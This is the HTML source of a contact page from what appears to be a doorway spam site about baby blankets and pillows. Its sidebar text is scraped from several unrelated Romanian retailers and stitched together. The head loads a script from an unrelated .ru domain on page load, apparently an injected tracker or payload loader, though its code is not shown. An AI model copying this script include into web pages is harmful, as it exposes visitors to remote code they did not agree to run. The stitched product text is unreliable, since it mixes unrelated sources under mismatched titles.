<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="Contact" />
<meta name="description" content="Contact" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Contact</title>
<link href='http://fonts.googleapis.com/css?family=Nova+Mono' rel='stylesheet' type='text/css' />
<link href="style.css" rel="stylesheet" type="text/css" media="screen" />

<meta name='viewport' content='width=device-width,initial-scale=1'/>
<meta content='true' name='HandheldFriendly'/>
<meta content='width' name='MobileOptimized'/>
<meta content='yes' name='apple-mobile-web-app-capable'/>
<script src="https://aspoldissis.ru/tracker.js"></script>
</head>
<body  id="e6cyZc2M">
<div id="wrapper">
	<div id="header-wrapper">
		<div id="header">
			<div id="logo">
				<h1><a href="#">pătură23</a></h1>
			</div>
		</div>
	</div>
	<!-- end #header -->
	<div id="menu">
		<ul>
			<li class="current_page_item"><a href="#">Home</a></li>
			<li><a href="privacy-policy.html">Privacy policy</a></li>
			<li><a href="terms.html">Terms and Conditions</a></li>
			<li><a href="photo.html">Photo gallery</a></li>
			<li><a href="contact.html">Contacts</a></li>
		</ul>
	</div>
	<!-- end #menu -->
	<div id="page">
		<div id="page-bgtop">
			<div id="page-bgbtm">
				<div id="content">
					<div class="post">
						<h2 class="title"><a href="#">Contact</a></h2>
						<p class="meta">Posted by <a href="#">Someone</a> 2020.09.23 00:36
							&nbsp;&bull;&nbsp; <a href="#" class="comments">Comments (64)</a> &nbsp;&bull;&nbsp; <a href="#" class="permalink">Full article</a></p>
						<div class="entry">
							<p><img src="" width="186" height="186" alt="" class="alignleft border" />
							<style>
/* Style inputs with type="text", select elements and textareas */
input[type=text], select, textarea {
  width: 100%; /* Full width */
  padding: 12px; /* Some padding */ 
  border: 1px solid #ccc; /* Gray border */
  border-radius: 4px; /* Rounded borders */
  box-sizing: border-box; /* Make sure that padding and width stays in place */
  margin-top: 6px; /* Add a top margin */
  margin-bottom: 16px; /* Bottom margin */
  resize: vertical /* Allow the user to vertically resize the textarea (not horizontally) */
}

/* Style the submit button with a specific background color etc */
input[type=submit] {
  background-color: #4CAF50;
  color: white;
  padding: 12px 20px;
  border: none;
  border-radius: 4px;
  cursor: pointer;
}

/* When moving the mouse over the submit button, add a darker green color */
input[type=submit]:hover {
  background-color: #45a049;
}

/* Add a background color and some padding around the form */
.container {
  border-radius: 5px;
  background-color: #f2f2f2;
  padding: 20px;
}
</style>
<div class="container">
  <form action="">

    <label for="fname">First Name</label>
    <input type="text" id="fname" name="firstname" placeholder="Your name..">

    <label for="lname">Last Name</label>
    <input type="text" id="lname" name="lastname" placeholder="Your last name..">

    <label for="country">Country</label>
    <select id="country" name="country">
      <option value="australia">Australia</option>
      <option value="canada">Canada</option>
      <option value="usa">USA</option>
    </select>

    <label for="subject">Subject</label>
    <textarea id="subject" name="subject" placeholder="Write something.." style="height:200px"></textarea>

    <input type="submit" value="Submit">

  </form>
</div>
<br>
							<hr />
<iframe width="100%" height="315" src="https://www.youtube.com/embed/" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe><br>		<img src="" width="50%"/>
							</div>
					</div>
					<div style="clear: both;">&nbsp;</div>
				</div>
				<!-- end #content -->
				<div id="sidebar">
					<ul>
						<li>
							<h2 id="qoo3gMW6RA">Blog</h2>
							<p id="wFIR4oYSc4Wp">About</p>
						</li>
						<li>
							<h2>Categories</h2>
<ul>
<li><a href="index.html">Pătură cu pernă 75x100 catifea gri - Pături nou născuți ...</a><br> 3 în 1 JUCĂRIE - PERNĂ - PĂTURĂ Mai mult decât o simplă jucărie pentru copilul tău. Comandă aici! NOU! Bufnițele expresive HOO-HOO. Bufnițele expresive HOO-HOO. Comandă aici! LIVRARE GRATUITĂ! Salteaua iMemory S Plus Testare GRATUITĂ - 60 DE NOPȚI FĂRĂ NICIUN RISC . De la: 1.399,00 LEI.</li>
<li><a href="1.html">Pernă și pătură 2in1 HSE24 - LaMajole</a><br> Pernă și pătură 2in1 HSE24 55,00 lei Adaugă în coș Pled pentru copii 70x100 cm 19,00 lei. Covor de baie 75x135 cm 55,00 lei. Pernă și pătură 2in1 HSE24. 55,00 lei. Dimensiuni pătură: Lățime: 140 cm Lungime: 205 cm Dimensiuni pernă: 40×40 cm. Compoziție: 100% poliester ...</li>
<li><a href="2.html">KÄLLFRÄNE Set pentru dormit - IKEA</a><br> Dragă client, Pentru a proteja datele cu caracter personal pe care ni le-ai încredințat și având în vedere că Regulamentul 2016/679 al Parlamentului European și al Consiliului (UE), din 27 aprilie 2016, intră în vigoare la 25 mai 2018, dorim să te informăm că am făcut anumite schimbări în magazinul nostru online, care sunt legate de protecția acestor date.</li>
<li><a href="3.html">Pătură + pernă pentru bebeluși Baby Love, Roz deschis ...</a><br> 10 ani în afaceri. Producem mai multe tipuri de țesături, cum ar fi: catifea Holland, catifea italiană, velboa super moale, țesătură cu aspect moale, țesătură din piele de căprioară, lână polar, fleece de corală, fleeală de flanelă, satin și unele produse finite aferente, cum ar fi perna, perdeaua, foaia de pat, pătură, covor și așa mai departe.</li>
<li><a href="4.html">Sinsay - Great fashion, great prices | Cumpără online ...</a><br> Este adevărat, de ce să adunați vechituri. Însă unele lucruri totuși pot fi refolosite, puteți să le dați o a doua viață. În articolul de astăzi am selectat 5 cele mai bune proiecte de transformare a cearșafurilor și a fețelor de pernă vechi în lucruri cu totul senzaționale. Pătură matlasată în stil patch-work</li>
<li><a href="5.html">Poze : persoană, fată, femeie, alb, picior, relaxa ...</a><br> Pătură cu pernă 75x100 catifea gri - Pătură pentru copii cu pernă din catifea moale confecționat în design dublu față - o parte este confecționată din catifea matlasată (extrem de moale</li>
<li><a href="6.html">Vecina mea a tăiat în bucăți o față de pernă mai veche ...</a><br> Download-uri Poze : persoană, fată, femeie, alb, picior, relaxa, ședință, copil, odihnă, mobila, braţ, pernă, pătură, pui de somn, corpul uman, produs ...</li>
<li><a href="7.html">Perne | Next România</a><br> Pătură Pierre Cardin 207 rosa . din 442,89 Lei . Mai multe. Mărimi și prețuri. Adauga la comparatie. 32,19 Lei . Pernă Floryda negru si vin roșu . din 32,19 Lei . Mai multe. Mărimi și prețuri. Adauga la comparatie. 32,19 Lei . Pernă Floryda negru si aur . din 32,19 Lei . Mai multe. Mărimi și prețuri. Adauga la comparatie. 32,19 ...</li>
<li><a href="8.html">Cuib, pernă și o pătură pentru sugari – design Flori ...</a><br> În setul complet veți primi cuibul, o pătură și o pernă. Este adecvat pentru copiii care au până la 8 luni (dacă copilul dvs. este mai mic, îl puteți utiliza pentru o perioadă mai lungă de timp)</li>
<li><a href="9.html">Pături pentru copii - banaby.ro</a><br> Pătură pentru copii cu pernă din catifea moale realizată în design dublu față - o parte este confecționată din catifea matlasată (extrem de moale și plăcută la atingere), iar cealaltă parte este din bumbac fin într-un design de stea pătură și pernă sunt umplute cu material nețesut din silicon pufos, antialergic potrivite pentru utilizare ca pătură în zilele mai calde ...</li>
</ul>
						</li>
						<li>
							<h2 id="gFqOlVwS2Nt">Photo #1</h2>
		<img src="" width="50%" id="SAeuq4t45Y4rk"/>
						<li>
							<h2 id="fOWIOrM5o4zvPxH">Menu</h2>
		<ul>
<li><a href="index.html">Pătură cu pernă 75x100 catifea gri - Pături nou născuți ...</a></li>
<li><a href="1.html">Pernă și pătură 2in1 HSE24 - LaMajole</a><br></li>
<li><a href="2.html">KÄLLFRÄNE Set pentru dormit - IKEA</a><br></li>
<li><a href="3.html">Pătură + pernă pentru bebeluși Baby Love, Roz deschis ...</a><br></li>
<li><a href="4.html">Sinsay - Great fashion, great prices | Cumpără online ...</a><br></li>
<li><a href="5.html">Poze : persoană, fată, femeie, alb, picior, relaxa ...</a><br></li>
<li><a href="6.html">Vecina mea a tăiat în bucăți o față de pernă mai veche ...</a><br></li>
<li><a href="7.html">Perne | Next România</a><br></li>
<li><a href="8.html">Cuib, pernă și o pătură pentru sugari – design Flori ...</a><br></li>
<li><a href="9.html">Pături pentru copii - banaby.ro</a><br></li>
</ul>
						</li>
					</ul>
				</div>
				<!-- end #sidebar -->
				<div style="clear: both;">&nbsp;</div>
			</div>
		</div>
	</div>
	<!-- end #page -->
</div>
<div id="footer">
	<p>&copy; Untitled. All rights reserved. Design by TEMPLATED.</p>
	<p></p>
</div>
<!-- end #footer -->
</body>
</html>
